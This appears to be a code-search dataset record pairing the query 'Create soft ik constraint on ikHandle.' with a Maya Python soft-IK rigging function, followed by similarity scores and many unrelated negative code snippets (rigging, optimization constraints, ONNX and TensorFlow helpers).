'+attr\n\n driver = mc.ls(mc.getAttr(attr) or '')\n hook = attr.split('.')[0]\n\n if mc.getAttr(attr) and not driver:\n print ' \\t***Cannot find driver for : '+attr\n\n if not driver:\n continue\n\n # remove any contraints\n utils.set_attrs(hook, 't r s', k=1, l=0)\n cons = utils.get_constraints(hook)\n if cons:\n mc.delete(cons)\n\n # create new contraints on HOOK\n if mc.objExists(hook+'.connectXforms'):\n mc.connectAttr(driver[0]+'.t', hook+'.t')\n mc.connectAttr(driver[0]+'.r', hook+'.r')\n mc.connectAttr(driver[0]+'.s', hook+'.s')\n\n else:\n constraint.constraint_mtx(driver[0], hook)\n #mc.parentConstraint(driver[0], hook, mo=1)\n #mc.scaleConstraint(driver[0], hook, mo=1)\n\n # connect vis attrs to world nod\n hook_parents = utils.get_children('parts_'+utils.get_suffix('transform'))\n world_node = mc.ls('world_CTL')\n vis_node = mc.ls('visibility_CTL')\n\n utils.set_attrs(world_node[0], 'worldScale', l=1, k=0)\n\n attrs = ['allCtrlsVis', 'offsetCtrlsVis', 'jointsVis', 'jointsSelectable']\n\n if hook_parents and world_node:\n for hook_parent in hook_parents:\n for attr in attrs:\n mc.connectAttr(vis_node[0]+'.'+attr, hook_parent+'.'+attr)\n\n # recreate any attrs from hook nodes onto driver nodes\n driven_hooks = [a.split('.')[0] for a in hook_node_attrs+att_node_attrs]\n hook_drivers = [mc.getAttr(a) or '' for a in hook_node_attrs+att_node_attrs]\n ignore = ['isRequired', 'hookDriver', 'worldScale']\n\n for i, hook in enumerate(driven_hooks):\n driver = hook_drivers[i]\n\n if mc.objExists(hook):\n\n # copy attrs from original leg ctrl to new foot ctrl\n data = udAttributes.get_data(hook)\n if not data:\n continue\n\n if 'worldScale' in data[hook]['data'].keys():\n del data[hook]['data']['worldScale']\n\n if 'worldScale' in data[hook]['attr_order']:\n data[hook]['attr_order'].remove('worldScale')\n\n data[driver] = data[hook]\n if hook != driver:\n del data[hook]\n\n udAttributes.set_data(data, verbose=False)\n\n #drive ik leg ctrl attrs with foot ctrl\n attrs = data[driver]['attr_order']\n for attr in attrs:\n if attr not in ignore:\n try:\n mc.connectAttr(driver+'.'+attr, hook+'.'+attr)\n except:\n pass\n\n utils.break_connections('C_worldRoot_GRP', 'allCtrlsVis')\n utils.set_attrs(hook_parents, l=1, k=1)\n\n #hide no transforms\n mc.hide(mc.ls('noXform_'+utils.get_suffix('transform')))" ]
[ "0.6865341", "0.670034", "0.6326762", "0.61733705", "0.6086193", "0.59026164", "0.57446015", "0.55481964", "0.540773", "0.5367092", "0.53659767", "0.51581305", "0.5066359", "0.493914", "0.48905978", "0.48687443", "0.48397043", "0.48023486", "0.47860128", "0.47808054", "0.4765842", "0.46816355", "0.4661322", "0.46589276", "0.46124357", "0.46079683", "0.4583597", "0.45763084", "0.4567212", "0.45632422", "0.45630243", "0.45546556", "0.45453438", "0.45427397", "0.4539293", "0.45008367", "0.4490997", "0.44881424", "0.4480169", "0.44777772", "0.44704214", "0.44599462", "0.44580975", "0.4443421", "0.4429649", "0.442954", "0.4428362", "0.44178653", "0.44053847", "0.43785024", "0.437345", "0.4371689", "0.43679824", "0.43565726", "0.43428615", "0.43420208", "0.43385178", "0.4332224", "0.4329079", "0.43215856", "0.43199807", "0.4315735", "0.4312818", "0.4308805", "0.43085843", "0.43085843", "0.43005636", "0.42991948", "0.42884895", "0.42854974", "0.42789394", "0.42735273", "0.42726117", "0.42674124", "0.42621312", "0.42602003", "0.4259534", "0.42532563", "0.42526552", "0.4242296", "0.42335388", "0.42273423", "0.42273378", "0.4218153", "0.42178276", "0.42133966", "0.42076454", "0.41992366", "0.4195682", "0.4194209", "0.41904527", "0.41897443", "0.41856888", "0.41847914", "0.4184296", "0.41689628", "0.41679853", "0.41657144", "0.4164999", "0.41423982" ]
0.7807563
0
Create soft ik constraint on ikHandle.
def create_soft_ik(ik_ctrl, ik_joints, ik_handle): # get name and constant variables name = ik_handle+'Soft' parent = utils.get_parent(ik_joints[0]) ik_handle_parent = utils.get_parent(ik_handle) # get total length of joint chain chain_length = 0 for jnt in ik_joints[1:]: chain_length += abs(mc.getAttr(jnt+'.tx')) mc.addAttr(ik_joints[0], ln='softIkChainLength', k=1, dv=chain_length) #create dist node, (distance between top ik_joint and ik_handle) = X soft_ik_root = utils.snap_locator(ik_joints[0], node_type='transform') soft_ik_root = mc.rename(soft_ik_root, name+'_root_'+utils.get_suffix('transform')) dist = utils.create_distance_reader(soft_ik_root, ik_handle_parent) #create the dSoft and softIK attributes on the controller mc.addAttr(ik_ctrl, ln='softIK', min=0, k=1) ctrl_clamp = mc.createNode('clamp') mc.connectAttr(ik_ctrl+'.softIK', ctrl_clamp+'.inputR') mc.setAttr(ctrl_clamp+'.minR', 0.0001) mc.setAttr(ctrl_clamp+'.maxR', 10000000) #create node network for soft IK da_pma = mc.createNode('plusMinusAverage', n=name+'_da_pma') x_minus_da_pma = mc.createNode('plusMinusAverage', n=name+'_x_minus_da_pma') negate_x_minus_md = mc.createNode('multiplyDivide', n=name+'_negate_x_minus_md') divBy_dSoft_md = mc.createNode('multiplyDivide', n=name+'_divBy_dSoft_md') pow_e_md = mc.createNode('multiplyDivide', n=name+'_pow_e_md') one_minus_pow_e_pma = mc.createNode('plusMinusAverage', n=name+'_one_minus_pow_e_pma') times_dSoft_md = mc.createNode('multiplyDivide', n=name+'_times_dSoft_md') plus_da_pma = mc.createNode('plusMinusAverage', n=name+'_plus_da_pma') da_cond = mc.createNode('condition', n=name+'_da_cond') dist_diff_pma = mc.createNode('plusMinusAverage', n=name+'_dist_diff_pma') defaultPos_pma = mc.createNode('plusMinusAverage', n=name+'_defaultPos_pma') #set operations mc.setAttr(da_pma+'.operation', 2) mc.setAttr(x_minus_da_pma+'.operation', 2) mc.setAttr(negate_x_minus_md+'.operation', 1) mc.setAttr(divBy_dSoft_md+'.operation', 2) mc.setAttr(pow_e_md+'.operation', 3) mc.setAttr(one_minus_pow_e_pma+'.operation', 2) mc.setAttr(times_dSoft_md+'.operation', 1) mc.setAttr(plus_da_pma+'.operation', 1) mc.setAttr(da_cond+'.operation', 5) mc.setAttr(dist_diff_pma+'.operation', 2) mc.setAttr(defaultPos_pma+'.operation', 2) #make connections mc.connectAttr(ik_joints[0]+'.softIkChainLength', da_pma+'.input1D[0]') mc.connectAttr(ctrl_clamp+'.outputR', da_pma+'.input1D[1]') mc.connectAttr(dist+'.localDistance', x_minus_da_pma+'.input1D[0]') mc.connectAttr(da_pma+'.output1D', x_minus_da_pma+'.input1D[1]') mc.connectAttr(x_minus_da_pma+'.output1D', negate_x_minus_md+'.input1X') mc.setAttr(negate_x_minus_md+'.input2X', -1) mc.connectAttr(negate_x_minus_md+'.outputX', divBy_dSoft_md+'.input1X') mc.connectAttr(ctrl_clamp+'.outputR', divBy_dSoft_md+'.input2X') mc.setAttr(pow_e_md+'.input1X', 2.718281828) mc.connectAttr(divBy_dSoft_md+'.outputX', pow_e_md+'.input2X') mc.setAttr(one_minus_pow_e_pma+'.input1D[0]', 1) mc.connectAttr(pow_e_md+'.outputX' , one_minus_pow_e_pma+'.input1D[1]') mc.connectAttr(one_minus_pow_e_pma+'.output1D', times_dSoft_md+'.input1X') mc.connectAttr(ctrl_clamp+'.outputR', times_dSoft_md+'.input2X') mc.connectAttr(times_dSoft_md+'.outputX', plus_da_pma+'.input1D[0]') mc.connectAttr(da_pma+'.output1D', plus_da_pma+'.input1D[1]') mc.connectAttr(da_pma+'.output1D', da_cond+'.firstTerm') mc.connectAttr(dist+'.localDistance', da_cond+'.secondTerm') mc.connectAttr(dist+'.localDistance', da_cond+'.colorIfFalseR') mc.connectAttr(plus_da_pma+'.output1D', da_cond+'.colorIfTrueR') mc.connectAttr(da_cond+'.outColorR', dist_diff_pma+'.input1D[0]') mc.connectAttr(dist+'.localDistance', dist_diff_pma+'.input1D[1]') mc.setAttr(defaultPos_pma+'.input1D[0]', 0) mc.connectAttr(dist_diff_pma+'.output1D', defaultPos_pma+'.input1D[1]') # Create new ik aim node up = [1,0,0] aim = [0,1,0] grp = mc.createNode('transform', n=name+'_soft_aim_'+utils.get_suffix('transform'), p=ik_handle_parent) gAim = mc.createNode('transform', n=name+'_soft_'+utils.get_suffix('transform'), p=grp) mc.aimConstraint(soft_ik_root, grp, aim=aim, u=up, wu=up, wut='objectRotation', wuo=ik_ctrl, n=grp+'_ac') mc.connectAttr(defaultPos_pma+'.output1D', gAim+'.ty') mc.pointConstraint(gAim, ik_handle) mc.parent(ik_handle, gAim) # parent stuff if parent: mc.parent(soft_ik_root, parent) return gAim
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_keep_in_constraint(self,der=2,limit=1e1,weight=1e5):\n print(\"Creating Keep in constraint\")\n constr = dict()\n constr['constraint_type'] = \"ellipsoid\"\n constr['weight'] = self.accel_weight\n constr['keep_out'] = False\n constr['der'] = der\n constr['x0'] = np.zeros(3)\n A = np.matrix(np.identity(3))\n limit = self.accel_lim\n A[0,0] = 1/limit**2\n A[1,1] = 1/limit**2\n A[2,2] = 1/limit**2\n constr['rot_mat'] = np.identity(3)\n constr['A'] = A\n\n\n self.qr_polytraj.add_constraint(constr['constraint_type'],constr,dynamic_weighting=False,sum_func=False)\n\n # self.qr_polytraj.run_astro()\n # self.update_path_markers()\n # acc_wp = self.get_accel_at_waypoints(\"main\")\n # self.interactive_marker_worker.make_controls(self.qr_polytraj.waypoints)\n # self.interactive_marker_worker.update_controls(self.qr_polytraj.waypoints,acc_wp = acc_wp)", "def create_fk_ik_switch(switch_ctrl, ik_handles, fk_ctrls, ik_ctrls, vis_ctrl=None, switch_attr_name='IK', vis_attr_name='fkIkCtrlVis'):\n\n fk_ctrls = mc.ls(fk_ctrls)\n ik_ctrls = mc.ls(ik_ctrls)\n ik_handles = mc.ls(ik_handles)\n\n if not vis_ctrl:\n vis_ctrl = switch_ctrl\n\n # Create attributes\n if not mc.objExists(switch_ctrl+'.'+switch_attr_name):\n mc.addAttr(switch_ctrl, ln=switch_attr_name, min=0, max=1, k=1)\n\n if not mc.objExists(vis_ctrl+'.'+vis_attr_name):\n mc.addAttr(vis_ctrl, ln=vis_attr_name, at='enum', en='auto:fkOnly:ikOnly:both', k=1)\n\n # Connect ik handles\n for handle in ik_handles:\n mc.connectAttr(switch_ctrl+'.'+switch_attr_name, handle+'.ikBlend')\n\n # Create swicth for ik ctrl\n ik_choice = utils.create_node('choice', n=vis_attr_name+'_ik_choice')\n mc.connectAttr(vis_ctrl+'.'+vis_attr_name, ik_choice+'.selector')\n mc.connectAttr(switch_ctrl+'.'+switch_attr_name, ik_choice+'.input[0]')\n mc.setAttr(ik_choice+'.input[1]', 0)\n mc.setAttr(ik_choice+'.input[2]', 1)\n mc.setAttr(ik_choice+'.input[3]', 1)\n\n for ctrl in ik_ctrls:\n mc.setAttr(ctrl+'.v', l=0)\n mc.connectAttr(ik_choice+'.output', ctrl+'.v', f=1)\n mc.setAttr(ctrl+'.v', l=1)\n\n # Create swicth for ik ctrl\n fk_choice = utils.create_node('choice', n=vis_attr_name+'_fk_choice')\n fk_rv = utils.create_node('reverse', n=vis_attr_name+'_fk_choice')\n mc.connectAttr(switch_ctrl+'.'+switch_attr_name, fk_rv+'.inputX')\n mc.connectAttr(vis_ctrl+'.'+vis_attr_name, fk_choice+'.selector')\n mc.connectAttr(fk_rv+'.outputX', fk_choice+'.input[0]')\n mc.setAttr(fk_choice+'.input[1]', 1)\n mc.setAttr(fk_choice+'.input[2]', 0)\n mc.setAttr(fk_choice+'.input[3]', 1)\n\n for ctrl in fk_ctrls:\n mc.setAttr(ctrl+'.v', l=0)\n mc.connectAttr(fk_choice+'.output', ctrl+'.v', f=1)\n mc.setAttr(ctrl+'.v', l=1)\n\n return True", "def createConstraint(self):\n return _libsbml.Model_createConstraint(self)", "def createConstraint(*argv):", "def _set_constraint(self):\n pass", "def _parse_initbound(self) :\n\t\tlogging.debug(\"Parsing initbound soft constraints\")", "def getCrossFormedGraphConstraintsPreventAnySwitch(self):\n makeLayer = self.makeLayer\n addNodeToLayer = self.addNodeToLayer\n eastWestEdgeFromTo = self.eastWestEdgeFromTo\n graph = self.graph\n setInLayerOrderConstraint = self.setInLayerOrderConstraint\n\n leftLayer = makeLayer(graph)\n rightLayer = makeLayer(graph)\n\n topLeft = addNodeToLayer(leftLayer)\n bottomLeft = addNodeToLayer(leftLayer)\n topRight = addNodeToLayer(rightLayer)\n bottomRight = addNodeToLayer(rightLayer)\n\n eastWestEdgeFromTo(topLeft, bottomRight)\n eastWestEdgeFromTo(bottomLeft, topRight)\n setInLayerOrderConstraint(topRight, bottomRight)\n setInLayerOrderConstraint(topLeft, bottomLeft)\n\n return graph", "def soft_constraint ( self , var , value , name = '' , title = '' ) :\n \n assert isinstance ( var , ROOT.RooAbsReal ) ,\\\n \"Invalid ``v'': %s/%s\" % ( var , type ( var ) ) \n assert isinstance ( value , VE ),\\\n \"Invalid ``value'': %s/%s\" % ( value , type ( value ) )\n\n assert 0 < value.cov2() , 'Invalid error for %s' % value\n \n name = name if name else 'Gauss_%s_%s' % ( var.GetName() , self.name ) \n title = title if title else 'Gaussian Constraint(%s,%s) at %s' % ( var.GetName() , self.name , value )\n \n # value & error as RooFit objects: \n val = ROOT.RooFit.RooConst ( value.value () )\n err = ROOT.RooFit.RooConst ( value.error () )\n \n # Gaussian constrains \n gauss = ROOT.RooGaussian ( self.var_name ( name ) , title , var , val , err )\n \n # keep all the created technical stuff \n self.aux_keep.append ( val )\n self.aux_keep.append ( err )\n self.aux_keep.append ( gauss )\n\n self.info ('Constraint is created %s=%s' % ( var.name , value ) )\n return gauss", "def _create_hardsigmoid(cls, op, op_t):\n node = cls._common_singa_tensor_to_onnx_node(op, op_t)\n\n node.attribute.extend([\n helper.make_attribute('alpha', op.alpha),\n helper.make_attribute('beta', op.gamma),\n ])\n return node", "def declare_physical_budget(model, k):\n\n m = model\n\n m.budget = pe.Constraint(expr=sum(1*m.delta_gen[g] for g in m.delta_gen.index_set()) +\\\n sum(1*m.delta_branch[k] for k in m.delta_branch.index_set()) +\\\n sum(1*m.delta_load[b] for b in m.delta_load.index_set()) +\\\n sum(1*m.delta_bus[b] for b in m.delta_bus.index_set()) == k)", "def test_create_hyperflex_auto_support_policy(self):\n pass", "def declare_physical_budget(model, k):\n\n m = model\n\n m.budget = pe.Constraint(expr=sum(5*m.delta_gen[g] for g in m.delta_gen.index_set()) +\\\n sum(1*m.delta_branch[k] for k in m.delta_branch.index_set()) +\\\n sum(3*m.delta_load[b] for b in m.delta_load.index_set()) +\\\n sum(1*m.delta_bus[b] for b in m.delta_bus.index_set()) == k)", "def _create_hardsigmoid(cls, onnx_node, inputs, opset_version):\n alpha = onnx_node.getattr(\"alpha\", 0.2)\n beta = onnx_node.getattr(\"beta\", 0.5)\n _, forward = cls._common_onnx_node_to_singa_op(onnx_node, inputs,\n opset_version)\n return _, forward(alpha, beta)", "def switch_to_ik(robot):\n\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n try:\n # Turn FK control visibility off\n pm.setAttr(fk_ctrls_path + '.v', 0)\n\n # Turn IK control visibility on\n pm.setAttr(target_ctrl_path + '.v', 1)\n pm.setAttr(format_path(__TARGET_CTRL_PATH + '|{1}target_CTRLShape',\n robot) + '.visibility', 1)\n\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.v'.format(robot), 1)\n except:\n # These aren't crucial to the switch as they're just visual, and \n # a connection or locking of any of these attributes might throw\n # an error, so let's just skip it\n pass\n \n try:\n # Snap IK Ctrl to FK location\n _snap_ik_target_to_fk(robot)\n except:\n raise MimicError('Error swithching to IK; could not snap IK CTRL to FK')\n\n ## Find closest IK configuration to current FK pose ##\n # Get FK config and all IK solutions\n ik_sols = find_ik_solutions(robot)\n fk_config = find_fk_config(robot)\n\n # Remove all MFG-specific offsets from the FK config\n solver_params = get_solver_params(robot)\n axis_offsets = solver_params.axis_offsets\n rot_directions = solver_params.rot_directions\n fk_config_norm = _normalize_fk_pose(fk_config, axis_offsets, rot_directions)\n\n ## TO-DO: account for FK config rotations above and below 180 degrees\n # Select the closes IK configuration to the given FK config\n ik_config = find_closest_config(fk_config_norm, ik_sols)\n\n # Match IK config to FK pose\n pm.setAttr(target_ctrl_path + '.ikSolution1', ik_config[0])\n pm.setAttr(target_ctrl_path + '.ikSolution2', ik_config[1])\n pm.setAttr(target_ctrl_path + '.ikSolution3', ik_config[2])\n\n # turn ik solve back on\n pm.setAttr(target_ctrl_path + '.ik', 1)", "def createConstraint(schemaName, tableName, constraint):\n return constraints[constraint.kind](schemaName, tableName, constraint)", "def create_sticky(ctx, iface, resource_config, **_):\n\n # Create a copy of the resource config for clean manipulation.\n params = \\\n dict() if not resource_config else resource_config.copy()\n\n lb_name = params.get(LB_NAME)\n policy_name = params.get(RESOURCE_NAME)\n\n if not lb_name:\n targs = \\\n utils.find_rels_by_node_type(\n ctx.instance,\n LB_TYPE)\n lb_name = \\\n targs[0].target.instance.runtime_properties[\n EXTERNAL_RESOURCE_ID]\n params.update({LB_NAME: lb_name})\n\n ctx.instance.runtime_properties[LB_NAME] = \\\n lb_name\n ctx.instance.runtime_properties[RESOURCE_NAME] = \\\n policy_name\n\n # Actually create the resource\n iface.create_sticky(params)", "def ikHandle(*args, autoPriority: bool=True, connectEffector: bool=True, createCurve: bool=True,\n createRootAxis: bool=True, curve: Union[name, bool]=None, disableHandles:\n bool=True, enableHandles: bool=True, endEffector: Union[AnyStr, bool]=\"\", exists:\n AnyStr=\"\", forceSolver: bool=True, freezeJoints: bool=True, jointList: bool=True,\n name: Union[AnyStr, bool]=\"\", numSpans: int=0, parentCurve: bool=True,\n positionWeight: Union[float, bool]=0.0, priority: Union[int, bool]=0, rootOnCurve:\n bool=True, rootTwistMode: bool=True, setupForRPsolver: bool=True, simplifyCurve:\n bool=True, snapCurve: bool=True, snapHandleFlagToggle: bool=True,\n snapHandleToEffector: bool=True, solver: Union[AnyStr, bool]=\"\", startJoint:\n Union[AnyStr, bool]=\"\", sticky: Union[AnyStr, bool]=\"\", twistType: Union[AnyStr,\n bool]=\"\", weight: Union[float, bool]=0.0, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def convert_softshrink(g, op, block):\n\n x = g.get_node(op.input(\"X\")[0])\n dtype = infer_type(x).checked_type.dtype\n threshold = _expr.const(op.attr(\"lambda\"), dtype=dtype)\n zeros = _op.zeros_like(x)\n out = _op.where(x < -threshold, x + threshold, zeros) + _op.where(\n x > threshold, x - threshold, zeros\n )\n g.add_node(op.output(\"Out\")[0], out)", "def constraints(self, x):\n pass", "def make_constraint(constraint):\n if isinstance(constraint, str) and constraint == \"array-like\":\n return _ArrayLikes()\n if isinstance(constraint, str) and constraint == \"sparse matrix\":\n return _SparseMatrices()\n if isinstance(constraint, str) and constraint == \"random_state\":\n return _RandomStates()\n if constraint is callable:\n return _Callables()\n if constraint is None:\n return _NoneConstraint()\n if isinstance(constraint, type):\n return _InstancesOf(constraint)\n if isinstance(\n constraint, (Interval, StrOptions, Options, HasMethods, MissingValues)\n ):\n return constraint\n if isinstance(constraint, str) and constraint == \"boolean\":\n return _Booleans()\n if isinstance(constraint, str) and constraint == \"verbose\":\n return _VerboseHelper()\n if isinstance(constraint, str) and constraint == \"cv_object\":\n return _CVObjects()\n if isinstance(constraint, Hidden):\n constraint = make_constraint(constraint.constraint)\n constraint.hidden = True\n return constraint\n raise ValueError(f\"Unknown constraint type: {constraint}\")", "def spline_ik(self):\n ikHandle, ikEffector, ikCurve = pm.ikHandle(\n name=self.name + \"_ikh\",\n startJoint=self.joints[0],\n endEffector=self.joints[-1],\n solver='ikSplineSolver',\n simplifyCurve=False\n )\n\n # Get the number of digits so we can set the zfill correctly,\n digits = len(str(len(ikCurve.cv)))\n\n # Iterate over each cv and create a cluster deformer,\n for i, cv in enumerate(ikCurve.cv):\n cluster_node, cluster_handle = pm.cluster(cv)\n cluster_handle.rename(\n ikCurve.nodeName() + '_ch_{}'.format(str(i).zfill(digits))\n )", "def create_soft_block_at(self, x, y):\n cell_size = self.map.get_cell_size()\n obj = SoftBlock(\n parent=self.map,\n style={\n 'width': cell_size, \n 'height': cell_size * 2, \n 'z-index': layers['object'] }\n )\n # I am a soft block\n block(obj)\n # Randomly put an item after I dead\n make_breakable(self, obj, \n on_die=lambda: self.put_item_random(x, y))\n\n self.map.add_node(obj, x, y, 0, -cell_size)\n return obj", "def _constraints_external(self):\n pass", "def make_constraint ( self , var , value , name = '' , title = '' ) :\n \n ## create the gaussian constraint\n gauss = self.soft_constraint ( var , value , name , title ) \n \n cnts = ROOT.RooArgSet ( gauss )\n \n result = ROOT.RooFit.ExternalConstraints ( cnts )\n \n self.aux_keep.append ( cnts )\n \n return result", "def make_untrainable(circuit, weights_initialized):\n\n def circuit_var(weights):\n circuit(weights_initialized)\n\n return circuit_var", "def test_get_hyperflex_auto_support_policy_by_moid(self):\n pass", "def constraints(self):\n ...", "def constraint_level(self, soft_constraint):\n return soft_constraint.is_soft, len(soft_constraint.get_variables())", "def SetConstraint(self, model) :\n if 'pp' in self.__type : self.SetPPConstraint( model )\n elif self.__type == 'prBin' and self.bound!=0 : self.SetPRBinConstraint( model )\n elif self.__type == 'prCat' and self.bound != 0 : self.SetPRCatConstraint(model)\n elif self.__type == 'prBinCat' and self.bound != 0 : self.SetPRBinCatConstraint(model)\n elif self.bound == 0 : return\n else : raise RuntimeError( 'SetConstraint : Unknown type for Constraint : ', self.__type )", "def _set_restricted_policy(environ, bag):\n username = environ['tiddlyweb.usersign']['name']\n if username == 'GUEST':\n return\n bag.policy.owner = username\n # accept does not matter here\n for constraint in ['read', 'write', 'create', 'delete', 'manage']:\n setattr(bag.policy, constraint, [username])\n return", "def _create_softmax(cls, op, op_t):\n node = cls._common_singa_tensor_to_onnx_node(op, op_t)\n\n node.attribute.extend([\n helper.make_attribute('axis', op.axis),\n ])\n return node", "def add_constraint_sig(self, constraint_sig):\n self.constraint_sigs.append(constraint_sig)", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def weak_repulsion_boundary(Cents,a,k, CV_matrix,n_c,n_C):\n CCW = np.dstack((roll_reverse(Cents[:,:,0]),roll_reverse(Cents[:,:,1])))#np.column_stack((Cents[:,1:3],Cents[:,0].reshape(-1,1,2)))\n CCW_displacement = Cents - CCW\n rij = np.sqrt(CCW_displacement[:,:,0]**2 + CCW_displacement[:,:,1]**2)\n norm_disp = (CCW_displacement.T/rij.T).T\n V_soft_mag = -k*(rij - 2*a)*(rij<2*a)\n V_soft_CCW = (V_soft_mag.T*norm_disp.T).T\n V_soft_CW = -(roll_forward(V_soft_mag).T*norm_disp.T).T\n V_soft = V_soft_CW + V_soft_CCW\n F_soft = np.zeros((n_c, 2))\n for i in range(3):\n F_soft += np.asfortranarray(CV_matrix[:, :, i])@np.asfortranarray(V_soft[:, i])\n F_soft[n_C:] = 0\n return F_soft", "def constraint_for(dist=None, param=None):\n\n constraints = {\n 'atol':\n tfb.Softplus(),\n 'rtol':\n tfb.Softplus(),\n 'concentration':\n tfb.Softplus(),\n 'GeneralizedPareto.concentration': # Permits +ve and -ve concentrations.\n lambda x: tf.math.tanh(x) * 0.24,\n 'concentration0':\n tfb.Softplus(),\n 'concentration1':\n tfb.Softplus(),\n 'df':\n tfb.Softplus(),\n 'InverseGaussian.loc':\n tfb.Softplus(),\n 'JohnsonSU.tailweight':\n tfb.Softplus(),\n 'PowerSpherical.mean_direction':\n lambda x: tf.math.l2_normalize(tf.math.sigmoid(x) + 1e-6, -1),\n 'ContinuousBernoulli.probs':\n tfb.Sigmoid(),\n 'Geometric.logits': # TODO(b/128410109): re-enable down to -50\n # Capping at 15. so that probability is less than 1, and entropy is\n # defined. b/147394924\n lambda x: tf.minimum(tf.maximum(x, -16.), 15.\n ), # works around the bug\n 'Geometric.probs':\n constrain_between_eps_and_one_minus_eps(),\n 'Binomial.probs':\n tfb.Sigmoid(),\n 'NegativeBinomial.probs':\n tfb.Sigmoid(),\n 'Bernoulli.probs':\n tfb.Sigmoid(),\n 'PlackettLuce.scores':\n tfb.Softplus(),\n 'ProbitBernoulli.probs':\n tfb.Sigmoid(),\n 'RelaxedBernoulli.probs':\n tfb.Sigmoid(),\n 'cutpoints': # Permit values that aren't too large\n lambda x: tfb.Ascending().forward(10. * tf.math.tanh(x)),\n 'log_rate':\n lambda x: tf.maximum(x, -16.),\n 'mixing_concentration':\n tfb.Softplus(),\n 'mixing_rate':\n tfb.Softplus(),\n 'rate':\n tfb.Softplus(),\n 'scale':\n tfb.Softplus(),\n 'scale_diag':\n tfb.Softplus(),\n 'scale_identity_multiplier':\n tfb.Softplus(),\n 'tailweight':\n tfb.Softplus(),\n 'temperature':\n tfb.Softplus(),\n 'total_count':\n lambda x: tf.floor(tfb.Sigmoid()(x / 100.) * 100.) + 1.,\n 'Bernoulli':\n lambda d: dict(d, dtype=tf.float32),\n 'CholeskyLKJ':\n fix_lkj,\n 'LKJ':\n fix_lkj,\n 'Zipf':\n lambda d: dict(d, dtype=tf.float32),\n 'GeneralizedNormal.power':\n tfb.Softplus(),\n }\n\n if param is not None:\n return constraints.get('{}.{}'.format(dist, param),\n constraints.get(param, tfb.Identity()))\n return constraints.get(dist, tfb.Identity())", "def __init__(self, weight, n_bits, initial_treg_factor=1e-3, solver=\"SCS\"):\n\n self.exactly_zero = bool(weight == n_bits)\n self.n_bits = n_bits\n self.n = int(2**n_bits)\n self.weight = weight\n self.dim = n_parameters(weight, n_bits)\n self.solver = solver\n self.initial_treg_factor = initial_treg_factor\n self.warning_msg = None\n\n # Hold values *separate* from cvxpy variables as we sometimes need to revert\n # cvxpy optimizations which actually move values in a way that gives a *worse*\n # objective function.\n self.t_params = _np.zeros(self.dim)\n\n # cvxpy parameters\n self.P = _cp.Parameter(shape=(self.n,), nonneg=True, value=_np.zeros(self.n))\n self.Q = _cp.Parameter(shape=(self.n,), nonneg=True, value=_np.zeros(self.n))\n\n if weight == 0: return # special case; nothing more needed\n\n # Initialze a regularization factor to keep the optimizer from putting large elements\n # in T that move weight between near-zero elements of both p and q. We might need\n # to adjust this later, so make it a parameter.\n self.Treg_factor = _cp.Parameter(nonneg=True, value=self.initial_treg_factor)\n\n # Build the basis and the constrain matrix - the basis used to construct the T vector\n self.t_basis, self.cons = build_basis(self.weight, self.n_bits)\n\n self._build_problem()", "def __basis0(self, xi):\n return np.where(np.all([self.knot_vector[:-1] <= xi,\n xi < self.knot_vector[1:]], axis=0), 1.0, 0.0)", "def create_ik_setup(controls, joints):\n\n # Create control offset transforms\n exp_tf_ms = []\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par:\n cmds.parent(buf, par[0])\n exp_tf_ms.append(buf)\n\n root_control, pole_control, goal_control = controls\n handle, effector = cmds.ikHandle(sj=joints[0], ee=joints[-1], sol='ikRPsolver')\n cmds.setAttr('{}.hiddenInOutliner'.format(handle), True)\n cmds.orientConstraint(goal_control, joints[-1], mo=True)\n cmds.parent(handle, goal_control)\n cmds.hide(handle)\n\n # Connect root control to ik joint offset group\n ik_joints_offset = cmds.listRelatives(joints[0], p=True)[0]\n cmds.parentConstraint(root_control, ik_joints_offset, mo=True)\n cmds.scaleConstraint(root_control, ik_joints_offset, mo=True)\n\n # Connect twisting and pole vector control\n cmds.addAttr(goal_control, ln='twist', at='float', k=True)\n cmds.connectAttr('{}.twist'.format(goal_control), '{}.twist'.format(handle))\n cmds.poleVectorConstraint(pole_control, handle)\n\n # Add PV visibility attribute\n cmds.addAttr(goal_control, shortName='pv', longName='poleVector', at='bool', k=True)\n cmds.connectAttr('{}.pv'.format(goal_control), '{}.v'.format(pole_control))\n cmds.setAttr('{}.pv'.format(goal_control),1)\n\n # Add curve that points elbow to pole control\n crv = cmds.curve(p=[[0, 0, 0], [0, 1, 0]], d=1)\n cmds.connectAttr('{}.visibility'.format(pole_control), '{}.visibility'.format(crv))\n lock_hide_attrs(crv, attrs=['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz'])\n cmds.setAttr('{}.overrideEnabled'.format(crv), True)\n cmds.setAttr('{}.overrideDisplayType'.format(crv), 2)\n decomp_joint = cmds.createNode('decomposeMatrix')\n decomp_control = cmds.createNode('decomposeMatrix')\n cmds.connectAttr('{}.worldMatrix'.format(joints[1]), '{}.inputMatrix'.format(decomp_joint))\n cmds.connectAttr('{}.worldMatrix'.format(pole_control), '{}.inputMatrix'.format(decomp_control))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_joint), '{}.controlPoints[0]'.format(crv))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_control), '{}.controlPoints[1]'.format(crv))\n\n return handle, crv, exp_tf_ms", "def __init__(self, dim, kinetic: Tuple[int] or Model = (128, 128), potential: Tuple[int] or Model = (128, 128)):\n self.kinetic = _mlp_models(dim, kinetic, \"softplus\", name=\"Kinetic\")\n self.potential = _mlp_models(dim, potential, \"softplus\", name=\"Potential\")\n self.dim = dim", "def test_creation_softbounds():\n value = -42\n softbounds = [-100, 100]\n num_a = param.Integer(value=value, 